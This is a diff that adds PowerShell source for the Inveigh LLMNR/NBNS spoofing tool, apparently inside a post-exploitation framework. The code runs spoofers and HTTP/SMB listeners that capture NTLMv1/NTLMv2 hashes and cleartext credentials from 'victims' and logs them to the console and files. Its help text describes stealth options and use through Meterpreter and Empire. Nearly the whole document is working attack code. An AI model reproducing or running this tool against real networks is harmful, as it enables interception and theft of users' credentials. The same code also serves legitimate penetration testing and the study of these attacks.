+            while($inveigh.NTLMv2_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+                $inveigh.NTLMv2_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.cleartext_file_queue.Count -gt 0)
+            {
+                $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+                $inveigh.cleartext_file_queue.RemoveAt(0)
+            }
+        
+        }
+
+        Start-Sleep -m 5
+    }
+ }
+
+# End ScriptBlocks
+# Begin Startup functions
+
+# HTTP Listener Startup function 
+function HTTPListener()
+{
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+    $HTTP_runspace.Open()
+    $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $HTTP_powershell = [PowerShell]::Create()
+    $HTTP_powershell.Runspace = $HTTP_runspace
+    $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
+        $HTTPBasicRealm).AddArgument($HTTPIP).AddArgument($HTTPPort).Addargument($HTTPResponse).AddArgument(
+        $NBNSBruteForcePause).AddArgument($WPADAuth).AddArgument($WPADEmptyFile).AddArgument($WPADIP).AddArgument(
+        $WPADPort).AddArgument($WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null
+    $HTTP_powershell.BeginInvoke() > $null
+}
+
+# LLMNR Spoofer Startup function
+function LLMNRSpoofer()
+{
+    $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+    $LLMNR_spoofer_runspace.Open()
+    $LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $LLMNR_spoofer_powershell = [PowerShell]::Create()
+    $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
+    $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument(
+        $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
+        $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
+        $LLMNRTTL) > $null
+    $LLMNR_spoofer_powershell.BeginInvoke() > $null
+}
+
+# NBNS Spoofer Startup function
+function NBNSSpoofer()
+{
+    $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+    $NBNS_spoofer_runspace.Open()
+    $NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $NBNS_spoofer_powershell = [PowerShell]::Create()
+    $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
+    $NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($NBNS_response_message).AddArgument(
+        $SpooferIP).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument(
+        $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
+        $NBNSTTL) > $null
+    $NBNS_spoofer_powershell.BeginInvoke() > $null
+}
+
+# Spoofer Startup function
+function NBNSBruteForceSpoofer()
+{
+    $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+    $NBNS_bruteforce_spoofer_runspace.Open()
+    $NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create()
+    $NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace
+    $NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument(
+        $SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument(
+        $NBNSBruteForcePause).AddArgument($NBNSTTL) > $null
+    $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null
+}
+
+# Control Unprivileged Startup function
+function ControlUnprivilegedLoop()
+{
+    $control_unprivileged_runspace = [RunspaceFactory]::CreateRunspace()
+    $control_unprivileged_runspace.Open()
+    $control_unprivileged_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $control_unprivileged_powershell = [PowerShell]::Create()
+    $control_unprivileged_powershell.Runspace = $control_unprivileged_runspace
+    $control_unprivileged_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $control_unprivileged_powershell.AddScript($control_unprivileged_scriptblock).AddArgument(
+        $NBNSBruteForcePause).AddArgument($RunTime) > $null
+    $control_unprivileged_powershell.BeginInvoke() > $null
+}
+
+# End Startup functions
+
+# Startup Enabled Services
+
+# HTTP Server Start
+if($HTTP -eq 'Y')
+{
+    HTTPListener
+}
+
+# LLMNR Spoofer Start
+if($LLMNR -eq 'Y')
+{
+    LLMNRSpoofer
+}
+
+# NBNS Spoofer Start
+if($NBNS -eq 'Y')
+{
+    NBNSSpoofer
+}
+
+# NBNSBruteForce Spoofer Start
+if($NBNSBruteForce -eq 'Y')
+{
+    NBNSBruteForceSpoofer
+}
+
+# Control Unprivileged Loop Start
+if($NBNSBruteForcePause -or $RunTime -or $inveigh.file_output)
+{
+    ControlUnprivilegedLoop
+}
+
+if($inveigh.console_output)
+{
+
+    if($ConsoleStatus)
+    {    
+        $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+        $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
+    :console_loop while(($inveigh.unprivileged_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+    {
+
+        while($inveigh.console_queue.Count -gt 0)
+        {
+
+            if($inveigh.output_stream_only)
+            {
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                $inveigh.console_queue.RemoveAt(0)
+            }
+            else
+            {
+
+                switch -wildcard ($inveigh.console_queue[0])
+                {
+
+                    "* written to *"
+                    {
+
+                        if($inveigh.file_output)
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                        }
+
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* for relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "*SMB relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* local administrator *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    default
+                    {
+                        Write-Output $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                }
+
+            }
+
+        }
+
+        if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+        {
+            
+            if($inveigh.cleartext_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+                $inveigh.cleartext_list.Sort()
+
+                foreach($unique_cleartext in $inveigh.cleartext_list)
+                {
+                    if($unique_cleartext -ne $unique_cleartext_last)
+                    {
+                        Write-Output($unique_cleartext + $inveigh.newline)
+                    }
+
+                    $unique_cleartext_last = $unique_cleartext
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+            }
+            
+            if($inveigh.NTLMv1_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv1_list.Sort()
+
+                foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+                {
+                    $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+                    {
+                        Write-Output($unique_NTLMv1 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv1_account_last = $unique_NTLMv1_account
+                }
+
+                $unique_NTLMv1_account_last = ""
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+                {
+                    Write-Output($NTLMv1_username + $inveigh.newline)
+                }
+
+                Start-Sleep -m 5
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            if($inveigh.NTLMv2_list.Count -gt 0)
+            {
+                Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+                $inveigh.NTLMv2_list.Sort()
+
+                foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+                {
+                    $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+                    if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+                    {
+                        Write-Output($unique_NTLMv2 + $inveigh.newline)
+                    }
+
+                    $unique_NTLMv2_account_last = $unique_NTLMv2_account
+                }
+
+                $unique_NTLMv2_account_last = ""
+                Start-Sleep -m 5
+                Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+                foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+                {
+                    Write-Output($NTLMv2_username + $inveigh.newline)
+                }
+                
+            }
+            else
+            {
+                Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+            }
+
+            $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+        }
+
+        if($inveigh.console_input)
+        {
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+        
+        }
+
+        Start-Sleep -s 1
+    }
+
+}
+
+if($inveigh.file_output -and !$inveigh.running)
+{
+
+    while($inveigh.log_file_queue.Count -gt 0)
+    {
+        $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+        $inveigh.log_file_queue.RemoveAt(0)
+    }
+
+    while($inveigh.NTLMv1_file_queue.Count -gt 0)
+    {
+        $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+        $inveigh.NTLMv1_file_queue.RemoveAt(0)
+    }
+
+    while($inveigh.NTLMv2_file_queue.Count -gt 0)
+    {
+        $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+        $inveigh.NTLMv2_file_queue.RemoveAt(0)
+    }
+
+    while($inveigh.cleartext_file_queue.Count -gt 0)
+    {
+        $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+        $inveigh.cleartext_file_queue.RemoveAt(0)
+    }
+
+}
+
+}
+#End Invoke-InveighBruteForce
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+
+        if($inveigh.HTTP_listener.IsListening)
+        {
+            $inveigh.HTTP_listener.Stop()
+            $inveigh.HTTP_listener.Close()
+        }
+            
+        if($inveigh.unprivileged_running)
+        {
+            $inveigh.unprivileged_running = $false
+            Start-Sleep -s 5
+            Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        }
+            
+        if($inveigh.relay_running)
+        {
+            $inveigh.relay_running = $false
+            Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+        if($inveigh.running)
+        {
+            $inveigh.running = $false
+            Write-Output("Inveigh exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+    }
+    else
+    {
+        Write-Output("There are no running Inveigh functions")
+    }
+    
+    if($inveigh.HTTPS)
+    {
+        & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+
+        try
+        {
+            $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+            $certificate_store.Open('ReadWrite')
+            $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+            $certificate_store.Remove($certificate)
+            $certificate_store.Close()
+        }
+        catch
+        {
+            Write-Output("SSL Certificate Deletion Error - Remove Manually")
+            $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
+            }
+
+        }
+    }
+
+    $inveigh.HTTP = $false
+    $inveigh.HTTPS = $false
+}
+else
+{
+    Write-Output("There are no running Inveigh functions")|Out-Null
+}
+
+} 
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set. 
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
+
+[CmdletBinding()]
+param
+( 
+    [parameter(Mandatory=$false)][Switch]$Console,
+    [parameter(Mandatory=$false)][Switch]$Log,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+    [parameter(Mandatory=$false)][Switch]$Cleartext,
+    [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+    [parameter(Mandatory=$false)][Switch]$Learning,
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($Console -or $PSBoundParameters.Count -eq 0)
+{
+
+    while($inveigh.console_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+            $inveigh.console_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -wildcard ($inveigh.console_queue[0])
+            {
+
+                "* written to *"
+                {
+
+                    if($inveigh.file_output)
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                    }
+
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* for relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "*SMB relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* local administrator *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+         
+    }
+
+}
+
+if($Log)
+{
+    Write-Output $inveigh.log
+}
+
+if($NTLMv1)
+{
+    Write-Output $inveigh.NTLMv1_list
+}
+
+if($NTLMv1Unique)
+{
+    $inveigh.NTLMv1_list.Sort()
+
+    foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+    {
+        $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+        if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+        {
+            Write-Output $unique_NTLMv1
+        }
+
+        $unique_NTLMv1_account_last = $unique_NTLMv1_account
+    }
+
+}
+
+if($NTLMv1Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($NTLMv2)
+{
+    Write-Output $inveigh.NTLMv2_list
+}
+
+if($NTLMv2Unique)
+{
+    $inveigh.NTLMv2_list.Sort()
+
+    foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+    {
+        $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+        if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+        {
+            Write-Output $unique_NTLMv2
+        }
+
+        $unique_NTLMv2_account_last = $unique_NTLMv2_account
+    }
+
+}
+
+if($NTLMv2Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($Cleartext)
+{
+    Write-Output $inveigh.cleartext_list
+}
+
+if($CleartextUnique)
+{
+    Write-Output $inveigh.cleartext_list | Get-Unique
+}
+
+if($Learning)
+{
+    Write-Output $inveigh.valid_host_list
+}
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+        Write-Output "Press any key to stop real time console output"
+        $inveigh.console_output = $true
+
+        :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+        {
+
+            while($inveigh.console_queue.Count -gt 0)
+            {
+
+                if($inveigh.output_stream_only)
+                {
+                    Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+                else
+                {
+
+                    switch -wildcard ($inveigh.console_queue[0])
+                    {
+                          
+                        "* written to *"
+                        {
+
+                            if($inveigh.file_output)
+                            {
+                                Write-Warning $inveigh.console_queue[0]
+                            }
+
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* for relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "*SMB relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* local administrator *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        default
+                        {
+                            Write-Output $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                    }
+
+                }
+                             
+            }
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+
+            Start-Sleep -m 5
+        }
+
+    }
+    else
+    {
+        Write-Output "Inveigh isn't running"
+    }
+
+}
+else
+{
+    Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+    if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+    {
+        Remove-Variable inveigh -scope global
+        Write-Output "Inveigh data has been cleared from memory"
+    }
+    else
+    {
+        Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+    }
+
+}
+
+}

--- a/pupy/external/Inveigh/Inveigh.ps1
+++ b/pupy/external/Inveigh/Inveigh.ps1
@@ -1,0 +1,2712 @@
+function Invoke-Inveigh
+{
+<#
+.SYNOPSIS
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/HTTPS/SMB.
+
+.DESCRIPTION
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features:
+
+    IPv4 LLMNR/NBNS spoofer with granular control
+    NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
+    Basic auth cleartext credential capture over HTTP/HTTPS
+    WPAD server capable of hosting a basic or custom wpad.dat file
+    HTTP/HTTPS server capable of hosting limited content
+    Granular control of console and file output
+    Run time control
+
+.PARAMETER IP
+Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the
+SpooferIP parameter is not set.
+
+.PARAMETER SpooferIP
+IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other
+than the Inveigh host.
+
+.PARAMETER SpooferHostsReply
+Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferHostsIgnore
+Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsReply
+Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsIgnore
+Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferLearning
+Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out
+LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the
+hostname to a spoofing blacklist.
+
+.PARAMETER SpooferLearningDelay
+(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through
+SpooferLearning.
+
+.PARAMETER SpooferLearningInterval
+Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a
+hostname that has already been checked if SpooferLearning is enabled.   
+
+.PARAMETER SpooferRepeat
+Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
+challenge/response has been captured.
+
+.PARAMETER LLMNR
+Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
+
+.PARAMETER LLMNRTTL
+Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+
+.PARAMETER NBNS
+Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
+
+.PARAMETER NBNSTTL
+Default = 165 Seconds: NBNS TTL in seconds for the response packet.
+
+.PARAMETER NBNSTypes
+Default = 00,20: Comma separated list of NBNS types to spoof.
+Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store and attached to port 443. If the script does not exit gracefully, execute 
+"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
+in the cert store.
+
+.PARAMETER HTTPAuth
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A 
+WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
+connecting to the root of the web server.
+
+.PARAMETER HTTPBasicRealm
+Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+
+.PARAMETER HTTPDir
+Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
+
+.PARAMETER HTTPDefaultFile
+Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for
+wpad.dat requests.
+
+.PARAMETER HTTPDefaultEXE
+EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. 
+
+.PARAMETER HTTPResponse
+String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. 
+
+.PARAMETER HTTPSCertAppID
+Valid application GUID for use with the ceriticate.
+
+.PARAMETER HTTPSCertThumbprint
+Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
+working directory and named Inveigh.pfx.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADEmptyFile
+Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
+Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
+using WPADIP, WPADPort, or WPADResponse.
+
+.PARAMETER WPADIP
+Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
+with WPADPort.
+
+.PARAMETER WPADPort
+Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
+used with WPADIP.
+
+.PARAMETER WPADDirectHosts
+Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
+defined proxy.
+
+.PARAMETER WPADResponse
+wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
+are set. Use PowerShell character escapes where necessary.
+
+.PARAMETER SMB
+Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
+direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to
+prevent login requests from being processed by the Inveigh host.  
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request.
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileUnique
+Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time file output is enabled.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh through a shell that does not return other output streams.Note that you will not see the various
+yellow warning messages if enabled.
+
+.PARAMETER OutputDir
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must
+also be enabled.
+
+.PARAMETER RunTime
+(Integer) Run time duration in minutes.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER Inspect
+(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
+
+.PARAMETER Tool
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire   
+
+.EXAMPLE
+Import-Module .\Inveigh.psd1;Invoke-Inveigh
+Import full module and execute with all default settings.
+
+.EXAMPLE
+. ./Inveigh.ps1;Invoke-Inveigh -IP 192.168.1.10
+Dot source load and execute specifying a specific local listening/spoofing IP.
+
+.EXAMPLE
+Invoke-Inveigh -IP 192.168.1.10 -HTTP N
+Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response.
+
+.EXAMPLE
+Invoke-Inveigh -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76
+Execute with the stealthiest options.
+
+.EXAMPLE
+Invoke-Inveigh -Inspect
+Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic.
+
+.EXAMPLE
+Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N
+Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be
+useful for sending traffic to a controlled Linux system on another subnet.
+
+.EXAMPLE
+Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>"
+Execute specifying an HTTP redirect response. 
+
+.NOTES
